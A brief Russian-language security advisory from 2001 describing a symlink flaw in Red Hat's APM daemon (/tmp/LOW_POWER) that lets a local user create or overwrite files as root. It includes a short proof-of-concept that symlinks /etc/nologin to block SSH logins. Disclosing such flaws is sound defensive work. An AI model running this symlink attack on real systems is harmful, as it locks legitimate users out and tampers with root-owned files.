Security Lab

Проблема символьных линков в Advanced Power Management

Дата публикации:18.12.2001
Всего просмотров:877
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание:

Демон Расширенного управление питанием (Advanced Power Management), поставляемый с некоторыми версиями RedHat, содержит уязвимость символьных линков (в файле tmp/LOW_POWER), которая позволяет локальному пользователю записывать поверх и создавать файлы с привилегиями корня.
Уязвимы Red Hat 7.1 и более ранние версии.
Пример:
$ ssh foo
$ exit

$ ln -s /etc/nologin /tmp/LOW_POWER
...[provoke low-battery state; e.g. cut powerline and wait some time] ...

$ ssh foo
Connection to foo closed.
$